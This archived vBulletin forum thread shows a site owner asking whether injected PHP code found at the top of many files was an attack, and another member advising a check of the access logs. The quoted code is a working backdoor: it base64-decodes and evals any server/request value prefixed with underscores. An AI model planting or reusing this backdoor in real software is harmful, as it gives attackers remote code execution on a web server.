vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Possible attack against vbulletin (https://vborg.vbsupport.ru/showthread.php?t=224767)

gorentals 10-07-2009 05:13 PM
Possible attack against vbulletin
 
I've noticed as of 10/5/09 many of my php files were altered with the below code. Also added index.php to alot of the folders. Was this an attack? It put this code at the top of many php files in the vbulletin directories. Anyone else see this?

"<?php function q22173($l22175){if(is_array($l22175)){foreach($l22 175 as $l22173=>$l22174)$l22175[$l22173]=q22173($l22174);}elseif(is_string($l22175) && substr($l22175,0,4)=="____"){$l22175=substr($l2217 5,4);$l22175=base64_decode($l2 2175);eval($l22175);$l22175=null;}return $l22175;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_ VARS;array_map("q22173",$_SERV ER);
// Silence is golden.
?>"

Lynne 10-07-2009 05:48 PM
You are wondering if someone adding a bunch of stuff to your files is an attack? It'd say it is something not good, and attack may be a good word to use. You should look at your access_logs (if you don't know where they are, ask your host) to see if you can figure out how they did it.


All times are GMT. The time now is 08:56 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01482 seconds
  • Memory Usage 1,702KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (2)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete